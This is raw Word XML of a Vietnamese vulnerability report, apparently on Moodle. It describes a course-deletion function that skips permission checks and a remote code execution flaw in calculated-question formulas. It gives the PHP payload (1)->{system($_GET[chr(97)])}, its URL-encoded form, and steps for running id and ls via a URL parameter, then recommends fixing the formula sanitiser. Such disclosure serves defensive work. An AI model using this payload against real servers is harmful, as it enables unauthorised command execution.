          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hàm DELETE_COURSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB4CB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sẽ xóa khóa học có ID được chỉ định, bỏ qua mọi kiểm tra quyền.</w:t>
      </w:r>
      <w:r w:rsidR="00104B87" w:rsidRPr="00901423">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BFF283C" wp14:editId="66B76E52">
            <wp:extent cx="5943600" cy="2731135"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1759723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33481738" w14:textId="3D0D16ED" w:rsidR="00104B87" w:rsidRDefault="00104B87" w:rsidP="009873F8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00901423">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2610288A" wp14:editId="54F00D6C">
            <wp:extent cx="5943600" cy="3190875"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1530722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6FAF81CD" w14:textId="77777777" w:rsidR="00104B87" w:rsidRDefault="00104B87" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Remote Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B139A19" w14:textId="77777777" w:rsidR="00104B87" w:rsidRDefault="00104B87" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tạo một câu hỏi được tính toán Đặt công thức trả lời thành</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0B7809" w14:textId="77777777" w:rsidR="00104B87" w:rsidRPr="00FA5FE5" w:rsidRDefault="00104B87" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(1)-&gt;{system($_GET[chr(97)])}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2508F200" w14:textId="77777777" w:rsidR="00104B87" w:rsidRDefault="00104B87" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>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183FD987" wp14:editId="6488DC18">
            <wp:extent cx="5943600" cy="2881630"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7530994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288880BA" w14:textId="77777777" w:rsidR="009873F8" w:rsidRDefault="009873F8" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DA88737" w14:textId="77777777" w:rsidR="009873F8" w:rsidRDefault="009873F8" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F2BBBC1" w14:textId="77777777" w:rsidR="009873F8" w:rsidRDefault="009873F8" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63389FDF" w14:textId="65581508" w:rsidR="00104B87" w:rsidRPr="00901423" w:rsidRDefault="00104B87" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Biểu thức bị sửa đổi thành 1-0-system($_GET{chr(97)})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A1EDB" w14:textId="77777777" w:rsidR="00104B87" w:rsidRDefault="00104B87" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4F88">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71706C91" wp14:editId="0BEB366F">
            <wp:extent cx="5943600" cy="3098800"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="35200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08315" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3098800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="325E802A" w14:textId="6BDF2C72" w:rsidR="00104B87" w:rsidRDefault="00104B87" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Chặn tin và  sửa đổi lại về </w:t>
      </w:r>
      <w:r w:rsidRPr="002B4F88">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(1)-&gt;{system($_GET[chr(97)])}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0767C3" w14:textId="11DC25E2" w:rsidR="00FB4CB3" w:rsidRDefault="00104B87" w:rsidP="009873F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4F88">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>%281%29-%3E%7Bsystem%28%24_GET%5Bchr%2897%29%5D%29%7D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1943E11C" w14:textId="77777777" w:rsidR="00104B87" w:rsidRDefault="00104B87" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4F88">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41FEB7C8" wp14:editId="47B8C14E">
            <wp:extent cx="5943600" cy="3708400"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="185546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6644" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3708400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D76503" w14:textId="77777777" w:rsidR="00FB4CB3" w:rsidRDefault="00FB4CB3" w:rsidP="009873F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F575B38" w14:textId="77777777" w:rsidR="00104B87" w:rsidRDefault="00104B87" w:rsidP="001117B8">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Xuất hiện lỗi </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>exception-system():Argument#1($command) cannotbe empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15533E20" w14:textId="77777777" w:rsidR="00104B87" w:rsidRPr="00901423" w:rsidRDefault="00104B87" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4F88">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A40D1CD" wp14:editId="63BD7F4F">
            <wp:extent cx="5783580" cy="3703098"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="209885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6007" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5785095" cy="3704068"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D3C51E" w14:textId="77777777" w:rsidR="00FB4CB3" w:rsidRDefault="00FB4CB3" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB4CB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cung cấp lệnh mong muốn bằng cách thêm &amp;a=[arbitrary command]vào URL. Đầu ra của lệnh hệ thống được chỉ định sẽ được đưa vào đầu phản hồi HTTP kết quả.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFFB5C0" w14:textId="7BAE8FE9" w:rsidR="00104B87" w:rsidRDefault="00104B87" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A=id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEC7CC4" w14:textId="77777777" w:rsidR="00104B87" w:rsidRDefault="00104B87" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4F88">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77C9F1BB" wp14:editId="17589904">
            <wp:extent cx="5739765" cy="2819400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="49027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70236" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5753863" cy="2826325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="742E0D64" w14:textId="77777777" w:rsidR="00104B87" w:rsidRDefault="00104B87" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="657D2EE6" w14:textId="28F25831" w:rsidR="00104B87" w:rsidRPr="00901423" w:rsidRDefault="00104B87" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A=ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7D1EDA" w14:textId="77777777" w:rsidR="00104B87" w:rsidRDefault="00104B87" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4F88">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="711536E2" wp14:editId="55E763F4">
            <wp:extent cx="5943600" cy="4966335"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="54735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53254" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4966335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24225462" w14:textId="77777777" w:rsidR="009873F8" w:rsidRDefault="009873F8" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="359127B2" w14:textId="27B25895" w:rsidR="00384243" w:rsidRDefault="00384243" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384243">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Recommends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E848F46" w14:textId="23C772F0" w:rsidR="009873F8" w:rsidRPr="009873F8" w:rsidRDefault="009873F8" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Sửa </w:t>
      </w:r>
      <w:r w:rsidRPr="009873F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hàm khử trùng qtype_calculated_find_formula_errors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009873F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>để /question/type/calculated/questiontype.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009873F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>luôn trả về giá trị sai nếu các câu hỏi được tính toán không được sử dụng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71521C43" w14:textId="77777777" w:rsidR="00104B87" w:rsidRPr="00104B87" w:rsidRDefault="00104B87" w:rsidP="001117B8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00104B87" w:rsidRPr="00104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56303"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="263C15CE"/>
    <w:lvl w:ilvl="0" w:tplc="42922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CA4F0B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E28A5B86"/>
    <w:lvl w:ilvl="0" w:tplc="FF8A01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88053059">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2045253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0E5"/>
    <w:rsid w:val="000C1210"/>
    <w:rsid w:val="00104B87"/>
    <w:rsid w:val="001117B8"/>
    <w:rsid w:val="00362FCA"/>
    <w:rsid w:val="00384243"/>
    <w:rsid w:val="00426A28"/>
    <w:rsid w:val="00452D0D"/>
    <w:rsid w:val="0068793F"/>
    <w:rsid w:val="006D728D"/>
    <w:rsid w:val="006F70E5"/>
    <w:rsid w:val="0070638C"/>
    <w:rsid w:val="0078797A"/>
    <w:rsid w:val="009873F8"/>
    <w:rsid w:val="00AC65D8"/>
    <w:rsid w:val="00AE3722"/>
    <w:rsid w:val="00C84A5C"/>
    <w:rsid w:val="00E43BEB"/>
    <w:rsid w:val="00F35FC8"/>
    <w:rsid w:val="00FB4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3B87E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{508EB589-C920-43F7-B4C5-696B3521D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7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83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o</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>n o</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-09-11T14:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-12T03:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>